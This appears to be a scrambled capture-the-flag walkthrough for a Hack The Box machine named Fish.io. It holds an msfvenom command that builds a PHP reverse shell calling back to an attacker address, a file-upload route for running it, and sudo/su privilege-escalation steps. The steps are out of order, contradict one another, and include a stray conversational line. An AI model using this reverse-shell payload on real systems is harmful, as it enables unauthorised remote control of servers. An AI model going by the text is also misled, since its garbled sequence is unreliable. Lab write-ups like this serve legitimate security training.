sudo -l

We can leverage this configuration to gain root access:

su root

sudo -u fish /bin/bash

Switching to the fish user, we find that the user's home directory contains a config file with sensitive information:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php

After uploading the shell to the server via the "Upload File" feature, we can trigger its execution by accessing the uploaded file:

<!-- TODO: move to prod env -->

This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:

You're interested in writing about Hack The Box's Fish.io, I presume?

With administrative access, we can now explore the application's functionality. Upon reviewing the dashboard, we notice an "Upload File" feature. This feature can potentially be used to execute arbitrary code on the server.

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services: